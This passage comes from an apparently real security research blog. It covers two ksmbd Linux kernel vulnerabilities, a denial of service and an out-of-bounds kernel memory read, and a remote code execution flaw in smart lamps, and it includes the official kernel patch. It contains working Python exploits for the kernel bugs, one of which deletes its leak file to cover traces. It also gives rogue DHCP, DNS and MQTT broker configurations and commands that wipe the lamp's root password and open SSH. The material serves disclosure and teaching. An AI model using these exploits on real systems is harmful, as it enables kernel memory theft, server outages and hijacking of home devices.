    request_write["TreeID"] = 0

    # chain SMB_WRITE to SMB_ECHO
    request_echo["Data"] += request_write.getData()

    print('[*] sending DoS packet...')
    conn.sendSMB(request_echo)

    print("[*] probing server health...")

    try:
        smb3.SMB3("127.0.0.1", "127.0.0.1", sess_port=445, timeout=3)
        print("[!] exploit failed - server remains online")
    except nmb.NetBIOSTimeout:
        print("[+] exploit succeeded - server is now offline")


if __name__ == "__main__":
    main()

Proof-of-Concept (PoC) exploit for ZDI-23-979 written in Python code.

The most important part of the patch is moving the session check into the chained request loop, which results into the session check being executed for each chained request in the packet, instead of just the first one.

+++ b/fs/ksmbd/server.c
@@ -184,24 +184,31 @@ static void __handle_ksmbd_work(struct k
 		goto send;
 	}
 
-	if (conn->ops->check_user_session) {
-		rc = conn->ops->check_user_session(work);
-		if (rc < 0) {
-			command = conn->ops->get_cmd_val(work);
-			conn->ops->set_rsp_status(work,
-					STATUS_USER_SESSION_DELETED);
-			goto send;
-		} else if (rc > 0) {
-			rc = conn->ops->get_ksmbd_tcon(work);
+	do {
+		if (conn->ops->check_user_session) {
+			rc = conn->ops->check_user_session(work);
 			if (rc < 0) {
-				conn->ops->set_rsp_status(work,
-					STATUS_NETWORK_NAME_DELETED);
+				if (rc == -EINVAL)
+					conn->ops->set_rsp_status(work,
+						STATUS_INVALID_PARAMETER);
+				else
+					conn->ops->set_rsp_status(work,
+						STATUS_USER_SESSION_DELETED);
 				goto send;
+			} else if (rc > 0) {
+				rc = conn->ops->get_ksmbd_tcon(work);
+				if (rc < 0) {
+					if (rc == -EINVAL)
+						conn->ops->set_rsp_status(work,
+							STATUS_INVALID_PARAMETER);
+					else
+						conn->ops->set_rsp_status(work,
+							STATUS_NETWORK_NAME_DELETED);
+					goto send;
+				}
 			}
 		}
-	}
 
-	do {
 		rc = __process_request(work, conn, &command);
 		if (rc == SERVER_HANDLER_ABORT)
 			break;
--- a/fs/ksmbd/smb2pdu.c

The official patch for ZDI-23-979.

ZDI-23-980: Out-Of-Bounds Read Information Disclosure

ZDI-23-980 is a network-based (un)authenticated out-of-bounds read in the ksmbd subsystem of the Linux kernel, which allows a user to read up to 65536 consequent bytes from kernel memory. This issue results from an buffer over-read, much like the Heartbleed vulnerability in SSL, where the request packet states that the packet content is larger than it's actual size, resulting in the parsing of the packet with a fake size.

This can be exploited by issueing an SMB_WRITE request with size N to file "dump.bin", whereby the actual request empty is smaller than N. Then, issue an SMB_READ request to download the "dump.bin" file and eventually delete "dump.bin" to remove the exploitation traces.

When I was researching this vulnerability, I also found an unauthenticated OOB read of 2 bytes using SMB_ECHO, but I figured this was less important than the authenticated OOB read of 65536 bytes due to usability (whether or not this was the right decision is up to debate ;-) ). Hence, the CVE description says it's authenticated. I will also discuss the SMB_ECHO and explain the exploitation behind that path. The 2-byte OOB read consists of issue'ing an SMB_ECHO command with the last 2 bytes of the packet not being filled in.

The underlying issue

The underlying issue leading to the OOB read is improper validation of the SMB request packet parameter smb2_hdr.NextCommand containing the offset to the next command. When NextCommand is set, the SMB server assumes that the current command/request is the size of NextCommand. Hence, when I have a packet of size N, I can set NextCommand to N+2, and it will assume the packet is N+2 bytes long. This can be seen in action in the ksmbd_smb2_check_message and smb2_calc_size functions. The function ksmbd_smb2_check_message does several assertions/validations:

hdr->StructureSize == 64
pdu->StructureSize2 == smb2_req_struct_sizes[command]  // SMB2_WRITE: 49, SMB2_ECHO: 4
hdr->NextCommand == pdu->StructureSize2 + hdr->StructureSize  // SMB_ECHO
hdr->NextCommand == hdr->DataOffset + hdr->Length  // SMB_WRITE

The assertions put onto the packet, for validation.

But it does not assert work->next_smb2_rcv_hdr_off + hdr->NextCommand <= get_rfc1002_len(work->request_buf), which is the official patch.

static int smb2_get_data_area_len(unsigned int *off, unsigned int *len,
				  struct smb2_hdr *hdr)
{
	int ret = 0;

	*off = 0;
	*len = 0;

	switch (hdr->Command) {
	// [snip] not reached
	case SMB2_WRITE:
		if (((struct smb2_write_req *)hdr)->DataOffset ||
		    ((struct smb2_write_req *)hdr)->Length) {
			*off = max_t(unsigned int,
				     le16_to_cpu(((struct smb2_write_req *)hdr)->DataOffset),
				     offsetof(struct smb2_write_req, Buffer));
			*len = le32_to_cpu(((struct smb2_write_req *)hdr)->Length);
			break;
		}

		*off = le16_to_cpu(((struct smb2_write_req *)hdr)->WriteChannelInfoOffset);
		*len = le16_to_cpu(((struct smb2_write_req *)hdr)->WriteChannelInfoLength);
		break;
	// [snip] not reached
	default:
		// [snip] not reached
	}

	// [snip] return error if offset > 4096

	return ret;
}

static int smb2_calc_size(void *buf, unsigned int *len)
{
	struct smb2_pdu *pdu = (struct smb2_pdu *)buf;
	struct smb2_hdr *hdr = &pdu->hdr;
	unsigned int offset; /* the offset from the beginning of SMB to data area */
	unsigned int data_length; /* the length of the variable length data area */
	int ret;

	*len = le16_to_cpu(hdr->StructureSize);
	*len += le16_to_cpu(pdu->StructureSize2);

	if (has_smb2_data_area[le16_to_cpu(hdr->Command)] == false) {
		// SMB_ECHO will reach this
        goto calc_size_exit;
	}

	// SMB_WRITE will reach this
	ret = smb2_get_data_area_len(&offset, &data_length, hdr);
    // [snip] return error if ret < 0

	if (data_length > 0) {
		// [snip] return error when data overlaps with next cmd

		*len = offset + data_length;
	}

calc_size_exit:
	ksmbd_debug(SMB, "SMB2 len %u\n", *len);
	return 0;
}

int ksmbd_smb2_check_message(struct ksmbd_work *work)
{
	struct smb2_pdu *pdu = ksmbd_req_buf_next(work);
	struct smb2_hdr *hdr = &pdu->hdr;
	int command;
	__u32 clc_len;  /* calculated length */
	__u32 len = get_rfc1002_len(work->request_buf);

	if (le32_to_cpu(hdr->NextCommand) > 0)
		len = le32_to_cpu(hdr->NextCommand);
	else if (work->next_smb2_rcv_hdr_off)
		len -= work->next_smb2_rcv_hdr_off;

	// [snip] check flag in header

	if (hdr->StructureSize != SMB2_HEADER_STRUCTURE_SIZE) {
		// [snip] return error
	}

	command = le16_to_cpu(hdr->Command);
	// [snip] check if command is valid

	if (smb2_req_struct_sizes[command] != pdu->StructureSize2) {
		// [snip] return error (with exceptions)
	}

	if (smb2_calc_size(hdr, &clc_len)) {
		// [snip] return error (with exceptions)
	}

	if (len != clc_len) {
		// [snip] return error (with exceptions)
	}

validate_credit:
	// [snip] irrelevant credit check

	return 0;
}

The functions causing the vulnerability.

As you can see, for SMB_WRITE we can set an arbitrary packet size by setting hdr->Length and hdr->NextCommand variables to compliment each other. As per SMB_ECHO, we just need to set hdr->NextCommand to the expected value, without actually filling in smb2_echo_req->reserved:

struct smb2_echo_req {
	struct smb2_hdr hdr;
	__le16 StructureSize;	/* Must be 4 */
	__u16  Reserved;
} __packed;

The smb2_echo_req struct.

Exploitation

To leak 2 bytes using SMB_ECHO:

Set smb2_echo_req->StructureSize = p16(4)
Set smb2_echo_req->hdr.NextCommand = sizeof(smb2_echo_req->hdr) + smb2_echo_req->StructureSize
Send request
Read echo response, with the last 2 bytes being an OOB read.

#!/usr/bin/env python3

from impacket import smb3
from pwn import p64, p32, p16, p8


def main():
    print("[*] connecting to SMB server...")
    conn = smb3.SMB3("127.0.0.1", "127.0.0.1", sess_port=445)

    packet = smb3.SMB3Packet()
    packet['Command'] = smb3.SMB2_ECHO
    packet["Data"] = p16(0x4)
    packet["NextCommand"] = 64+4

    print("[*] sending OOB read...")
    conn.sendSMB(packet)

    print("[*] reading response...")
    rsp = conn.recvSMB().rawData
    print(rsp)


if __name__ == "__main__":
    main()

ZDI-23-980 PoC exploit using SMB_ECHO

For the SMB_WRITE path, here's the struct and the steps:

struct smb2_write_req {
	struct smb2_hdr hdr;
	__le16 StructureSize; /* Must be 49 */
	__le16 DataOffset; /* offset from start of SMB2 header to write data */
	__le32 Length;
	__le64 Offset;
	__u64  PersistentFileId; /* opaque endianness */
	__u64  VolatileFileId; /* opaque endianness */
	__le32 Channel; /* MBZ unless SMB3.02 or later */
	__le32 RemainingBytes;
	__le16 WriteChannelInfoOffset;
	__le16 WriteChannelInfoLength;
	__le32 Flags;
	__u8   Buffer[];
} __packed;

The smb2_write_req struct.

Set smb2_write_req->StructureSize = 49
Set smb2_write_req->DataOffset = smb2_write_req->StructureSize + 64 to start reading the content without the packet
Set smb2_write_req->Length = 65536 to write 65536 bytes from the packet to the file
Set smb2_write_req->hdr.NextCommand = smb2_write_req->Length + smb2_write_req->DataOffset to spoof the request size
Open a file in the SMB share in read/write mode: file_id = smb_open("dump.bin", "rw")
Set smb2_write_req->PersistentFileId = file_id
Send the request
Read the file in the SMB share: dump = smb_read(file_id)

#!/usr/bin/env python3

from impacket import smb3
from pwn import p64, p32, p16, p8


def main(username: str, password: str, share: str, filename: str):
    print("[*] connecting to SMB server...")
    conn = smb3.SMB3("127.0.0.1", "127.0.0.1", sess_port=445)

    print(f"[*] logging into SMB server in (username: '{username}', password: '{password}')...")
    conn.login(user=username, password=password)

    print(f"[*] connecting to tree/share: '{share}'")
    tree_id = conn.connectTree(share)

    packet = smb3.SMB3Packet()
    packet['Command'] = smb3.SMB2_WRITE

    StructureSize = 49
    DataOffset = 64 + StructureSize  # fixed packet size excl buffer
    Length = 0x10000  # max credits: 8096, so max buffer: 8096*8 (0x10000), but max IO size: 4*1024*1024 (0x400000)

    # this is ugly but acquires a RW handle for the '{filename}' file containing the memory
    file_id = conn.create(tree_id, filename, desiredAccess=smb3.FILE_READ_DATA|smb3.FILE_SHARE_WRITE, creationDisposition=smb3.FILE_OPEN|smb3.FILE_CREATE,
                            creationOptions=smb3.FILE_NON_DIRECTORY_FILE, fileAttributes=smb3.FILE_ATTRIBUTE_NORMAL, shareMode=smb3.FILE_SHARE_READ|smb3.FILE_SHARE_WRITE)

    packet["Data"] = (p16(StructureSize) + p16(DataOffset) + p32(Length) + p64(0) + file_id[:8] + p64(0) + p32(0) + p32(0) + p16(0) + p16(0) + p32(0) + p8(0))
    packet["TreeID"] = tree_id
    packet["NextCommand"] = DataOffset+Length  # the end of the buffer is past the end of the packet

    print(f"[*] sending OOB read for 65536 bytes... (writing to file '{filename}')")
    conn.sendSMB(packet)

    print("[*] closing file descriptors...")
    conn.close(tree_id, file_id)  # close fd's bcs impacket is impacket

    print(f"[*] reading file containing kernel memory: '{filename}'")
    conn.retrieveFile(share, filename, print)  # print file (containing kmem dump)


if __name__ == "__main__":
    main("user", "pass", "files", "dump.bin")

ZDI-23-980 PoC exploit using SMB_WRITE

Conclusion

Thank you for reading my write-up on this Linux kernel vulnerability. I hope you learned about the ksmbd kernel subsystem and that you like the write-up style.

For questions, job inquiries, and other things, please send an email to notselwyn@pwning.tech (PGP key).

How I hacked smart lights: the story behind CVE-2022-47758

notselwyn — Wed, 08 Mar 2023 07:30:00 GMT

Introduction

In this blogpost, we take a closer look at our research regarding CVE-2022-47758: a critical vulnerability impacting a very large number of Internet of Things smart devices. We could leverage this vulnerability in the lamp's firmware for unauthenticated remote code execution on the entire device with the highest privileges and hence abuse it for information gathering (and for haunting someone in their own house). Additionally, we could pivot to the management devices using a vulnerability in the smart lamps' desktop management software (CVE-2022-46640). To make matters more interesting: the vulnerable traffic flowed through an encrypted outbound connection which means that it typically isn't blocked by a firewall. This blogpost serves as a cautionary tale for both vendors and consumers, highlighting the importance of IoT security. Join us as we dive into the technical details and lessons learned from our research.

Proof of Concept exploit

The goal of our proof of concept (PoC) exploit is proving that we can remotely execute code on our own smart lamps. For the PoC exploit we're redirecting local traffic to the vendors MQTT(S) broker to our own machine via malicious DNS records. In practice, an attacker could perform this redirect by committing either a rogue DHCP server attack, hacking a router, hacking a DNS server, et cetera. Once we have control over the MQTT traffic, we send a debugging command to a debugging endpoint on our smart lamp. Finally, we activate a persistent OpenSSH server in order to easily access the lamp.

Methodology

We use the following methodology in this blogpost:

*.acme.org - the vendor domain names
mqtt.acme.org - the vendor MQTT broker domain name
192.168.128.0/24 - our controlled network environment
192.168.128.10 - our attacker machine
192.168.128.20 - our vulnerability smart device

Spoofing DNS

In order to spoof DNS we need to set up a rogue DHCP server. The Dynamic Host Configuration Protocol (DHCP) is primarily used by network administrators to set the private ip addreses of devices on the network dynamically. However, DHCP packets also have a few more interesting parameters: domain name servers IP addresses, hostnames, and even gateway IP addresses. In order to MitM MQTT traffic to mqtt.acme.org, we are setting the domain name of the smart lamp by creating a malicious DHCP offer - using our rogue DHCP server - which sets the domain name server to 192.168.128.10.

By installing isc-dhcp-server on our Linux install and configuring it to run maliciously on our local network environment (192.168.128.0/24). We want to make the smart lamp use our own DNS resolver over at 192.168.128.10. The configuration we use is as following:

subnet 192.168.128.0 netmask 255.255.255.0 {
    range                           192.168.128.10 192.168.128.254;
    option broadcast-address        192.168.128.255;
    option routers                  192.168.128.1;
    option subnet-mask              255.255.255.0;
    option domain-name-servers      192.168.128.10;  # set DNS resolver

    host router {
        hardware ethernet ;
        fixed-address 192.168.128.1;
    }

    host attacker {
        hardware ethernet ;
        fixed-address 192.168.128.10;
    }

    host lamp {
        hardware ethernet ;
        fixed-address 192.168.128.20;
    }
}

/etc/dhcp/dhcpd.conf - setup DHCP server to spoof DNS and spoof DNS

In order to change the IP address to which mqtt.acme.org points, we need to setup our own DNS resolver by installing bind9 and setting a custom DNS record for the zonemqtt.acme.org which points to our own MQTT broker:

;
; BIND data file for local loopback interface
;
$TTL	604800
@	IN	SOA	mqtt.acme. root.mqtt.acme.org. (
			      2		; Serial
			 604800		; Refresh
			  86400		; Retry
			2419200		; Expire
			 604800 )	; Negative Cache TTL

;
@	IN	NS	ns.mqtt.acme.org.
ns	IN	A	192.168.128.10
@	IN	A	192.168.128.10

/etc/bind/named.conf.local - malicious DNS record (redirects traffic to our malicious IP)

Setting up a malicious MQTT broker

Since our traffic to mqtt.acme.org now points to our own IP address (192.168.128.10), we can eavesdrop the traffic. However, in order to interact with this traffic, we need to set an MQTT broker up on 192.168.128.10. We do this so we can publish to a custom debugging MQTT channel devoted to debugging (custom made by Acme). By publishing on this MQTT channel, we can execute commands. It's important that the server listens on port 443, has TLS encryption and allows anonymous logins. Hence, if the smart lamp tries to connect to mqtts://nobody@mqtt.acme.org:443 it should succeed. We configured it by using the following configuration:

# Place your local configuration in /etc/mosquitto/conf.d/
#
# A full description of the configuration file is at
# /usr/share/doc/mosquitto/examples/mosquitto.conf.example

listener 443
cafile /etc/mosquitto/ca_certificates/ca.crt
keyfile /etc/mosquitto/certs/server.key
certfile /etc/mosquitto/certs/server.crt
tls_version tlsv1.2
allow_anonymous true
protocol mqtt

persistence true
persistence_location /var/lib/mosquitto/
log_dest file /var/log/mosquitto/mosquitto.log

include_dir /etc/mosquitto/conf.d

/etc/mosquitto/mosquitto.conf - malicious MQTT(S) broker to allows all logins

As you might have noticed, we are dealing with MQTTS. Like HTTPS, the S in MQTTS stands for Secure. In order to make such a protocol secure, we need to create TLS certifications so we can encrypt the MQTT trafifc coming from our own MQTT broker. We can create such TLS certifications by running the following command:

$ openssl genrsa -des3 -out /etc/mosquitto/ca_certificates/ca.key 2048
$ openssl req -new -x509 -days 1826 -key /etc/mosquitto/ca_certificates/ca.key -out /etc/mosquitto/certs/ca.crt
$ openssl genrsa -out /etc/mosquitto/certs/server.key 2048

Creating TLS keys/certificates using OpenSSL

Performing the exploit

Now we have our infrastructure set up, we need to reboot the lamp such that it will trigger a DHCP discover request as part of the Discover Offer Request Accept (DORA) sequence. The next part of the DORA sequence would be 'Offer', where the server offers a new IP address (and our domain name server IP address) to our smart lamp. That offer will set the lamps DNS records of mqtt.acme.org to 192.168.128.10.

We can confirm that the vulnerable smart lamp is using our own MQTT broker by inspecting the local traffic using Wireshark on 192.168.128.10. After the victim device has connected to our server, we want to activate an OpenSSH server. In order to do this, we create the /acme/ssh_enabled file which enables persistent SSH access after the device reboots. We could probably do it without rebooting, be it would be a lot more unnecessary effort. After that, we stop the debugging of the touch command, and instead debug passwd -d root which deletes the password for the root user. This is convenient, because the default password is unknown and this way we can set the password without a TTY. Additionally the SSH server allows passwordless logins. In order to pull it off, we execute the following commands using mosquitto_pub (publishes messages to the Mosquitto broker):

$ mosquitto_pub -L mqtts://127.0.0.1:443/acme/device/serialno/exec/server -m "debug /bin/touch /acme/ssh_enabled" --insecure --cafile /etc/mosquitto/certs/ca.crt
$ mosquitto_pub -L mqtts://127.0.0.1:443/acme/device/serialno/exec/server -m "stop" --insecure --cafile /etc/mosquitto/certs/ca.crt
$ mosquitto_pub -L mqtts://127.0.0.1:443/acme/device/serialno/exec/server -m "debug /bin/passwd -d root" --insecure --cafile /etc/mosquitto/certs/ca.crt
$ mosquitto_pub -L mqtts://127.0.0.1:443/acme/device/serialno/exec/server -m "stop" --insecure --cafile /etc/mosquitto/certs/ca.crt
$ mosquitto_pub -L mqtts://127.0.0.1:443/acme/device/serialno/exec/server -m "debug /sbin/reboot" --insecure --cafile /etc/mosquitto/certs/ca.crt

Sending our payloads to our own MQTT broker

Once we started the OpenSSH server on the smart lamp, we can log into our smart lamp by simply executing ssh root@192.168.128.20.

$ ssh root@192.168.128.20

root@192.168.128.20:~ $ uname -a
Linux AcmeProduct-MAC 4.14.195 #0 Sun Sep 6 16:19:39 2020 mips GNU/Linux

Analyzing the smart device firmware

Since we have access to the firmware, we can analyze the firmware by extracting it using Binwalk - a tool for analyzing and extracting firmware. By running it with the -e (--extract) parameter, we can extract the firmware partitions. In our case, we can see that we have 3 partitions: a bootloader, a kernel, and an OpenWRT install (interestingly enough).

$ binwalk -e 4.5.1.firmware

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
80            0x50            uImage header, header size: 64 bytes, header CRC: 0xF012020D, created: 2020-09-06 16:19:39, image size: 1594132 bytes, Data Address: 0x80000000, Entry Point: 0x80000000, data CRC: 0xFB832D09, OS: Linux, CPU: MIPS, image type: OS Kernel Image, compression type: lzma, image name: "MIPS OpenWrt Linux-4.14.195"
144           0x90            LZMA compressed data, properties: 0x6D, dictionary size: 8388608 bytes, uncompressed size: 5029060 bytes
1594276       0x1853A4        Squashfs filesystem, little endian, version 4.0, compression:xz, size: 7060690 bytes, 1210 inodes, blocksize: 262144 bytes, created: 2020-09-06 16:19:39

Binwalk output when extracting the firmware

Enumerating the OpenWRT installation

The output of Binexp is a SquashFS filesystem instance which got carved out of the extracted partition. SquashFS performs heavy compressions and hence it probably was used by the smart lamp developers because it saves storage costs. Since SquashFS doesn't have different layers such as OverlayFS, we do not have any hassle regarding fixing the FS.

$ tree . -L 2
.
├── 4.5.1.firmware
└── squashfs
    ├── bin
    ├── dev
    ├── etc
    ├── lib
    ├── mnt
    ├── acme_config
    ├── overlay
    ├── proc
    ├── rom
    ├── root
    ├── sbin
    ├── sys
    ├── tmp
    ├── usr
    ├── var -> tmp
    └── www

The output directory of binwalk

One of the first things we did was verifying with what OS we were working and checking which users existed on the device. After we established that the lamp was running OpenWRT - a router OS interestingly enough - and we couldn't find any custom users in /etc/passwd, we decided to look into the next interesting directory: /acme_config/.

$ cat etc/os-release                 
NAME="OpenWrt"
VERSION="19.07.4"
ID="openwrt"
ID_LIKE="lede openwrt"
PRETTY_NAME="OpenWrt 19.07.4"
VERSION_ID="19.07.4"
HOME_URL="https://openwrt.org/"
BUG_URL="https://bugs.openwrt.org/"
SUPPORT_URL="https://forum.openwrt.org/"
BUILD_ID="r11208-ce6496d796"
OPENWRT_BOARD="ramips/mt76x8"
OPENWRT_ARCH="mipsel_24kc"
OPENWRT_TAINTS="no-all busybox"
OPENWRT_DEVICE_MANUFACTURER="OpenWrt"
OPENWRT_DEVICE_MANUFACTURER_URL="https://openwrt.org/"
OPENWRT_DEVICE_PRODUCT="Generic"
OPENWRT_DEVICE_REVISION="v0"
OPENWRT_RELEASE="OpenWrt 19.07.4 r11208-ce6496d796"

/etc/os-release - OS related information

$ cat etc/passwd
root:x:0:0:root:/root:/bin/ash
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
dnsmasq:x:453:453:dnsmasq:/var/run/dnsmasq:/bin/false

/etc/passwd - users on the device

We started searching in /acme_config/ for interesting keywords such as grep -iRPe '(ssh)|(mqtt)|(ftp)|(api)' to find possible exposed services as an attack surface. As we researched the binaries containing the specified keywords, we found out that a particular binary called ColorCC.bin contained the entire smart lamp API accessible via HTTP (built using the OpenAPI C++ SDK). We tried searching for memory corruption bugs for easy RCE but could not find any. Next, a binary called cloud_daemon caught our attention because it contained an MQTT client...

Investigating the MQTT handler

In order to grasp the internal logic of the cloud_daemon, we can open it in Ghidra. Ghidra is a software reverse engineering suite developed by the National Security Agency (NSA). We can use Ghidra to decompile Assembly instructions (the raw instructions that go into the CPU) into normal C, which is relatively readable by code monkeys like us.

void main(int argc,char **env)
{
  int iVar1;
  long lVar2;
  int i;
  char **ppcVar3;
  long port;
  char *pcVar4;
  char addr_str [128];
  pthread_t pThread;
  undefined4 uStack_34;
  char *pcStack_30;
  
  printf("This is Cloud Daemon version %s (%s)\n","1.12.0",
         "1.12.0 / Wed Aug 26 09:08:45 EDT 2020 / Backlog0740 / Color_develop");
  signal(2,ctrlc_handler);
  signal(0xf,ctrlc_handler);
  memset(addr_str,0,0x80);
  port = 0;
  do {
    if (argc <= 1) {
      // set MQTT channel variables
      sprintf(&update_server,"acme/device/%s/update/server",&ROM_SERIAL_NUMBER);
      sprintf(&update_client,"acme/device/%s/update/client",&ROM_SERIAL_NUMBER);
      sprintf(&exec_server,"acme/device/%s/exec/server",&ROM_SERIAL_NUMBER);
      sprintf(&exec_client,"acme/device/%s/exec/client",&ROM_SERIAL_NUMBER);
      sprintf(&uptime_server,"acme/device/%s/uptime/server",&ROM_SERIAL_NUMBER);
      sprintf(&uptime_client,"acme/device/%s/uptime/client",&ROM_SERIAL_NUMBER);

      // print which MQTT channels will be used for what
      printlog(3,"We will publish firmware communications to [%s]\n",&update_client);
      printlog(3,"We will receive firmware communications from [%s]\n",&update_server);
      printlog(3,"We will publish debug communications to [%s]\n",&exec_client);
      printlog(3,"We will receive debug communications from [%s]\n",&exec_server);
      printlog(3,"We will publish health communications to [%s]\n",&uptime_client);
      printlog(3,"We will receive health communications from [%s]\n",&uptime_server);
      
      set_host(addr_str, port);
     
      // creates posix thread to execute the start_firmware_checks() function
      while (iVar1 = pthread_create(&pThread, NULL, start_firmware_checks, &DAT_00414c84), iVar1 != 0 ) {
        printlog(1,"Error creating https upgrade check thread, retrying in %d seconds ...\n",timeout);
        printlog(1,"Error in (func, line): %s, %d\n", &function, 0x41f);
        sleep(timeout);
      }

      printlog(2, "Successfully launched https upgrade check thread\n");
      cloud_pipe_start(&ROM_DEVICE_ID,&ROM_SERIAL_NUMBER, channel, on_disconnect_cb, on_tick_cb, 1000);
      if (DAT_004152f0 != 0) {
        printlog(2, "Rebooting\n");
        system("reboot");
      }
      return;
    }
}

main() function - initializes the MQTT client channels

Client will publish firmware communications to [acme/device/serialno/update/client]
Client will receive firmware communications from [acme/device/serialno/update/server]
Client will publish debug communications to [acme/device/serialno/exec/client]
Client will receive debug communications from [acme/device/serialno/exec/server]
Client will publish health communications to [acme/device/serialno/uptime/client]
Client will receive health communications from [acme/device/serialno/uptime/server]

Communication channels used by MQTT client

We can see that cloud_pipe_start() (libcloudpipe.so) is called in main(), which registers several callback functions: cloud_pipe_start(..., ..., register_channels, on_disconnect_cb, on_tick_cb, ...). The function register_channels is a wrapper for registering handlers for the MQTT channels discussed above.

void register_channels(void)
{
  printlog(2,"Connection up\n");
  cloud_pipe_subscribe(&uptime_server,respond_healthcheck);
  cloud_pipe_subscribe(&update_server,update_firmware);
  cloud_pipe_subscribe(&exec_server,debug);
  return;
}

register_channels() - registers the MQTT message handlers per MQTT channel

The most interesting handler function sounds like debug, which handles messages on the channel /acme/device/serialno/exec/server. This function handles debug requests: it can execute a binary (debug a process) based on the MQTT requests parameters, or kill the process (stop the debugging). In order to start debugging a binary, we can publish the following the the server exec channel: debug /bin/echo "Hello World!", of which "Hello World!" should be nicely returned in an MQTT message on the channel /acme/device/serialno/exec/client. When we want to execute another binary or generally stop debugging, we can simply issue a stop command.

So far, I hope that the following part of the MQTT payload in the PoC exploit makes sense:

# create a file called /acme_config/ssh_enabled by 'debugging' /bin/touch
$ mosquitto_pub -L mqtts://127.0.0.1:443/acme/device/serialno/exec/server -m "debug /bin/touch /acme/ssh_enabled" --insecure --cafile /etc/mosquitto/certs/ca.crt

# stop debugging so we can execute another command
$ mosquitto_pub -L mqtts://127.0.0.1:443/acme/device/serialno/exec/server -m "stop" --insecure --cafile /etc/mosquitto/certs/ca.crt

# delete (reset) the root password by 'debugging' /bin/passwd
$ mosquitto_pub -L mqtts://127.0.0.1:443/acme/device/serialno/exec/server -m "debug /bin/passwd -d root" --insecure --cafile /etc/mosquitto/certs/ca.crt

# stop debugging so we can execute another command
$ mosquitto_pub -L mqtts://127.0.0.1:443/acme/device/serialno/exec/server -m "stop" --insecure --cafile /etc/mosquitto/certs/ca.crt

# reboot to start the OpenSSH server, but we can probably do it without reboot
$ mosquitto_pub -L mqtts://127.0.0.1:443/acme/device/serialno/exec/server -m "debug /sbin/reboot" --insecure --cafile /etc/mosquitto/certs/ca.crt

A rewind to the PoC exploit payload commands

Investigating the communication protocol

Now we have a primitive for our exploit: a debugging endpoint which could be abused if we could send messages on the /acme/device/serialno/exec/server channel of the MQTT broker. Mind you, it would cause CHAOS if this MQTT broker could be hacked to allow an attacker to send messages to all devices connected to the MQTT broker. Since we don't want to try to hack the vendor since it would be cybercrime, we aren't going to test the official MQTT broker, so we tried to find ways to MitM the traffic going to mqtt.acme.org, however we couldn't succeed since it used TLS... But - we asked ourselves - what if the TLS configuration was insecure? E.g. an insecure version?

In order to find the TLS configuration, we dug into the functions that were called to setup the MQTT client: cloud_pipe_subscribe and cloud_pipe_start. By running a simple grep -iRe 'cloud_pipe_subscribe' query again, we can see that our function is originating from /acme_config/acme_programs/libcloudpipe.so.

$ grep -iRe 'cloud_pipe_subscribe'
grep: lib/libcloudpipe.so: binary file matches
grep: acme_config/acme_programs/cloud_daemon: binary file matches
grep: acme_config/acme_programs/libcloudpipe.so: binary file matches
grep: sbin/cloud_daemon: binary file matches

grep - utility for searching strings

An interesting part of the cloud_pipe_start() function is the subsystem where a TLS network connection gets initiated by ConnectNetwork() and the MQTTClient gets initiated by MQTTClient(). We can find the TLS configuration in ConnectNetwork() and I quickly identified the used TLS library as mbedtls. Whilst searching for documentation of the used functions in the mbedtls library, I found out that the parameter MBEDTLS_SSL_VERIFY_NONE gets passed to the configuration function mbedtls_ssl_conf_authmode. This means that TLS certifications are not validated...

  sprintf(port_str,"%d",port);
  printf("  . Connecting to %s:%s...",addr,port_str);
  fd_stdout = stdout;
  fflush(stdout);
  param1 = mbedtls_net_connect(&ctx_net,addr,port_str,0);
  if (param1 != 0) {
    printf(" failed\n  ! mbedtls_net_connect returned %d\n\n",param1);
    return -1;
  }
  puts(" ok");
  initiated_seed = 0;
  printf("  . Setting up the SSL/TLS structure...");
  fflush(fd_stdout);
  pcVar4 = (char *)0x0;
  pcVar3 = (code *)0x0;
  success = mbedtls_ssl_config_defaults((undefined4 *)&ssl_config,0,0,0);
  if ((int *)success == (int *)0x0) {
    puts(" ok");

    // mbedtls_ssl_conf_authmode() - Set the certificate verification mode
    // 
    // #define MBEDTLS_SSL_VERIFY_NONE 0
    mbedtls_ssl_conf_authmode((int)&ssl_config,0);
    mbedtls_ssl_conf_rng(ssl_config, mbedtls_ctr_drbg_random, &ctx_ctr_drbg_init);
    pcVar3 = (code *)fd_stdout;
    mbedtls_ssl_conf_dbg((int)&ssl_config,&LAB_0002d068,fd_stdout);
    success = mbedtls_ssl_setup((undefined4 *)&DAT_00100838,&ssl_config);

ConnectNetwork() - create the TLS connection to a server

We have the final piece.

Creating a Proof of Concept exploit

The primitives in our exploit are complete: we have a dangerous debugging endpoint listening to a server which can be eavesdropped. Now it's a matter of performing a Man-in-the-Middle (MitM) attack on the MQTT broker and creating a payload to send.

We have plenty of options to MitM network traffic when the TLS certifications aren't verified, but our favorite approach is using a rogue DHCP server to serve fake DNS records. We picked the isc-dhcp-server DHCP service because it works on Linux and because it's very customizable. We're using option domain-name-server to set the DNS server to 192.168.128.10 on the smart lamp. This means that if the lamp requests mqtt.acme.org, it will be resolved by our own DNS resolver over at 192.168.128.10

We used bind9 as a DNS resolver in order to create fake DNS zones/records. We created a basic type A (IPv4) DNS record for mqtt.acme.org which redirects to our own MQTT broker 192.168.128.10. Usually these kind of attacks are prevented by verifying the TLS certifications of the broker as a client, but the smart lamp did not perform those verification checks.

For the final serice we needed an MQTT broker, for which we chose mosquitto. We didn't configure it at all and just made sure that it was possible to publish and subscribe to any MQTT channels. However, we had to make sure that our service was running on port 443 (which is typically used for HTTPS), that it supported TLS, and that anonymous logins were allowed (anonymous login means that any username/password is allowed to login).

Now we have our entire infrastructure up and running, we need to send the payload commands to our own MQTT broker. We can easily use the mosquitto_pub utility for this to publish our own messages to specific channels. Additionally, we can use the mosquitto_sub utility for subscribing to other channels so that we can receive stdout from the smart lamp. In order to easily get our very own OpenSSH server we need to create a file called /acme_config/ssh_enabled and reboot. However, root is the only user with a default shell (/bin/ash) but we don't know its password.

$ cat etc/passwd
root:x:0:0:root:/root:/bin/ash
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
dnsmasq:x:453:453:dnsmasq:/var/run/dnsmasq:/bin/false

/etc/passwd - contains user information

